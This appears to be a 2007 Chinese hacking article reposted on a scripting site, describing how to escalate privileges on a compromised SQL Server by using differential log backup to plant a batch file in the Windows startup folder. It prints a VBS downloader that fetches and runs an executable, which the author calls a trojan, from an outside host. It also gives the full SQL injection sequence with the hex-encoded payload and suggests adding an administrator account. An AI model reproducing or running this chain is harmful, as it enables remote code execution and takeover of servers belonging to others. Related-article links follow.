MSSQL差异备份取系统权限的相关软件下载

更新时间:2007年11月09日 20:20:05   作者:

昨天在网上找资料的时间无意进了一个站,糊里糊涂就进去了,想提权提不起来,后来加上服务商的Q号想社工一下,射了半天得知服务器的安全是绿盟的人给做的 安全,后来就问猪猪有什么提权的方法没,他刚好做了这个动画就给发来过来,在网上查了一下找到了文章,一起拷贝过来.最近忙着学习很少关注这方面的东西, 落后了,落后了......

下面是是在网上找到的资料和动画.

TEAM里的内部资料放久了,现在不放出来,迟早会有人发掘出来的!既然如此就拿出来大家分享吧!

MSSQL差异备份获取webshell 几乎人人皆知,那么我们可以利用差异备份出来的文件 当作恶意代码

让系统执行了之后自动提升权限 或者添加管理员吗? 答案当然可以了,kj021320测试了N次之后跟你说!

那么我们得考虑文件摆放的位置~什么地方系统会运行呢?这个其实算是废话吧!

大家不用想都知道 通用地方 C:\Documents and Settings\All Users\「开始」菜单\程序\启动

呵呵位置有了! 那么我们备份什么文件让系统能执行的呢?

这个是第一个关键点~!

EXE  JS  VBS  BAT这些文件大家第一时间想到的了

那些我一个一个来分析 exe的话!绝对能了! 但是 MSSQL差异备份这么多垃圾肯定会把exe弄坏的!

否决掉

然后到脚本

VBS 我们能不能把 他的垃圾信息注释掉呢? 不然VBS 会执行不了! OK 学过VBS的朋友都知道

VBS里面 有2种注释 '  还有就是 rem

但是还是会有垃圾信息屏蔽不了

否决掉

JS呢? JS里面有多行注释的/**/  但是 /* 不可能在首行吧?

否决掉

最后 剩下我们最熟悉的bat批处理了!

OK我们继续分析 bat里面注释是什么呢?也是REM,失败啊!之前vbs那里不行 这里的rem注释也一样不行的!

那么我们怎么办呢?其实很简单! 当我们在CMD下面敲错了命令系统会怎样呢?

说到这里 要是大家不往文章下面看也一样能想到方法了吧~

OK我们继续探~~这里是最最关键点,差异备份出来的垃圾信息我们可以通过用回车把他提交了!

而系统只当作无用的命令来处理!不影响我们的操作!

问题就这样解决了吗?不是的!~MSSQL备份的时候,到一定的字符长度就会出现垃圾的字符,那个字符会影响我们的操作!

那么我们得把语句尽量缩少,越少越好~

OK那我们思路好了就采用bat 写一个VBS的下载者 然后执行这个下载者 最后通过下载者down回来的马子来获取系统权限

下面是我改过的生成下载者的BAT

echo Set P=createObject("Microsoft.XMLHTTP")>k.vbs

echo P.Open "GET","http://www.isto.cn/t.exe",0 >>k.vbs

echo P.Send():set G=createObject("ADODB.Stream")>>k.vbs

echo G.Mode=3:G.Type=1:G.Open() >>k.vbs

echo G.Write P.ResponseBody:G.SaveToFile "t.exe",2 >>k.vbs

k.vbs

t

下一个k.VBS然后k.vbs下载一个t.exe文件保存到本地 直接执行

记得记得我说过的代码前面一定要用回车把垃圾数据提交 最好2以上个回车

然后实现差异备份

alter database ISTO set RECOVERY FULL--

create table cmd (a image)--

backup log ISTO to disk = 'c:\cmd1' with init--

insert into cmd (a) values (0x130A0D0A6563686F2053657420503D6372656174654F626A65637428224D696372

6F736F66742E584D4C4854545022293E6B2E7662730D0A6563686F20502E4F70656E2

022474554222C22687474703A2F2F7777772E6973746F2E636E2F742E657865222C30

203E3E6B2E7662730D0A6563686F20502E53656E6428293A73657420473D63726561

74654F626A656374282241444F44422E53747265616D22293E3E6B2E7662730D0A65

63686F20472E4D6F64653D333A472E547970653D313A472E4F70656E2829203E3E6B

2E76627320200D0A6563686F20472E577269746520502E526573706F6E7365426F64

793A472E53617665546F46696C652022742E657865222C32203E3E6B2E7662730D0A

6B2E7662730D0A740D0A)--

backup log ISTO to disk = 'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\1.bat'--

drop table cmd--

OK bat出来了! 至于怎样让服务器重启呢!这个问题遗留给你们去讨论吧!

要是服务器直接开启了3389 那就更方便了! 直接bat 一个添加管理员的命令更爽!

isto是动画里用到的工具.

isto辅助转换工具.rar

mssql差异备份取系统权限.rar

相关文章

这篇文章主要介绍了SQL语句性能优化(续),设计到性能优化相关知识,本文介绍的非常详细,具有参考借鉴价值,感兴趣的朋友一起学习吧2016-03-03

这篇文章主要介绍了Sql Server 数据库中调用dll文件的过程,非常不错,具有一定的参考借鉴价值,感兴趣的朋友跟随脚本之家小编一起学习吧2018-05-05

这篇文章主要给大家介绍了关于sql server性能调优 I/O开销的相关资料,文中通过示例代码以及图片介绍的非常详细,对大家的理解和学习具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧2018-07-07

本文我们主要对SQL Server多表查询的优化方案进行了总结,并给出了实际的例子进行性能与效率的对比,需要的朋友可以参考下2015-08-08

本篇文章介绍了,SQL Server的基本功能性语句。需要的朋友参考下2013-04-04

Sql function 多行中的列合并为一行一列的方法,需要的朋友可以参考下。2010-11-11

这篇文章主要给大家介绍了关于SQL Server利用sp_spaceused如何查看表记录存在不准确情况的相关资料,文中通过示例代码介绍的非常详细,对大家学习或者使用SQL Server具有一定的参考学习价值,需要的朋友们下面来一起学习学习吧2019-04-04

这篇文章主要介绍了SQLServer数据库的各种管理方法,需要的朋友可以参考下2015-10-10

数据处理在现代企业运营中变得越来越重要,越来越关键,甚至会成为企业发展的一项瓶颈. 数据保护的重要性也不言而喻. 如果一个企业没有很好的数据保护方案或策略的话,一旦发生重要数据丢失,后果将会是灾难性的,伴随着会有经济利益方面的损失.2010-07-07

在sql语句中,如果查找某个文本字段值为空的,可以用select * from 表 where 字段='' ,但是如果这个字段数据类型是text或者ntext,那上面的sql语句就要出错了。2008-08-08

最新评论

mysql差异备份提权_MSSQL差异备份取系统权限的相关软件下载相关推荐

  1. MSSQL差异备份取系统权限

    MSSQL差异备份取系统权限 TEAM里的内部资料放久了,现在不放出来,迟早会有人发掘出来的!既然如此就拿出来大家分享吧! MSSQL差异备份获取webshell 几乎人人皆知,那么我们可以利用差异备 ...

  2. SQL注入-基于MySQL的注入提权(十七)

    实验目的(我的2003是32位的懒得搞了,大家参照一下吧) 普及结合dll文件对Windows系统进行启动项提权.MOF和UDF提权的基本思路,以及提权的主要方法.PS:面试时不要说打靶场什么东西,就 ...

  3. mysql进行mof提权_Mysql结合mof提权

    Mysql结合mof提权 作者:admin 发布于:2013-5-25 17:41 Saturday 分类:网络转载 from:http://zone.wooyun.org/content/1795 ...

  4. mysql sys exec_mysql提权lib_mysqludf_sys执行sys_exec出现32256的问题解决办法

    使用lib_mysqludf_sys提权,执行select sys_exec返回数字32256问题的主要原因是所执行的shell脚本无权限,也就是mysql无法执行,将shell脚本放在mysql s ...

  5. mysql mof提权_三、mysql 之mof提权学习

    一.测试环境 win2003 + phpnow 二.使用条件 mysql + root权限 三.工具准备 (1)工具1: 准备好mof提权脚本(具体mof脚本,已上传网盘) (2)工具2: 准备好菜刀 ...

  6. mysql进行mof提权_MySQL数据库Root权限MOF方法提权研究

    MySQL数据库Root权限MOF方法提权研究 MySQL Root权限MOF方法提权是来自国外Kingcope大牛发布的MySQL Scanner & MySQL Server for Wi ...

  7. mysql进行mof提权_技术干货:MySQL数据库Root权限MOF方法提权研究

    MySQL Root权限MOF方法提权是来自国外Kingcope大牛发布的MySQL Scanner & MySQL Server for Windows Remote SYSTEM Leve ...

  8. Mysql之UDF提权

    前言 mysql提权的几种方式 udf提权(常用) mof提权 开机启动脚本(启动项提权) 提权目的:mysql权限 -> 操作系统权限 UDF提权 有时候我们通过一些方式获取了目标主机mysq ...

  9. MySQL函数及提权

    在 sql 注入时为了应对各种限制措施,利用数据库自带的一些系统函数经过各种变换之后可以绕过一些 安全设备或者一些基础防御的措施,比如一些字符串转换的函数.截取字符串长度的函数等, 应用的场景包括:通 ...

最新文章

  1. java中相同名字怎么声明,Java中,同一个类中的两个或两个以上的方法可以有同一个名字,只要他们的参数声明不同即可...
  2. 关于NullPointerException
  3. shell脚本常用命令
  4. UVa 1609 (博弈) Foul Play
  5. oracle修改表字段
  6. 2019龙少php泛站群,龙少php泛站群|PHP版站群 全自动泛解析站群程序 赠送教程
  7. 深度学习笔记_损失函数softmax和SVM
  8. 2021年PMP考试模拟题3(含答案)
  9. 大数据战略对企业生存有多重要?
  10. 洛谷P1792 [国家集训队]种树 题解
  11. 2019.07.一年级暑假——自动随机生成100以内加减法算术题的python实现
  12. 个人博客建设——Hexo主题icarus的_config.icarus.yml配置参数注释
  13. 变换累次积分顺序的方法和原理(图文详解)
  14. H5游戏营销如何入手,最经典h5游戏案例盘点
  15. 计算机黑屏启动超慢,电脑开机很慢然后黑屏连不上网怎么办(新手可学的4种简单处理方法)...
  16. Qt扫盲-QTabWidget理论总结
  17. todo谷粒商城三分布式组件-SpringCloud Alibaba与SpringCloud
  18. 基于FPGA的键盘扫描程序的设计
  19. java单线程异步_Java 实现异步调用
  20. Java接口多线程并发测试 (二)

热门文章

  1. 3D建模大佬如何制作出惊艳四方的游戏建模
  2. 第十四届蓝桥杯三月真题刷题训练——第 10 天
  3. 器件 — ISOLATION AMPLIFIER — ISO124 Precision Lowest Cost ISOLATION AMPLIFIER
  4. 在微软工作是怎样一番体验
  5. c语言 标准多线程库,关于C语言多线程pthread库的功能描述
  6. Java分割字符串、拼接字符串
  7. 图瓦软件:AVEVA PDMSE3D三维实体管道支吊架介绍
  8. 如何用pscc 2018圆角插件mac版制作倒圆角
  9. 扫雷与算法:如何随机化的布雷(二)之洗牌算法
  10. linux udev 激活usb网卡,linux – 用于USB设备的udev规则并忽略其他设备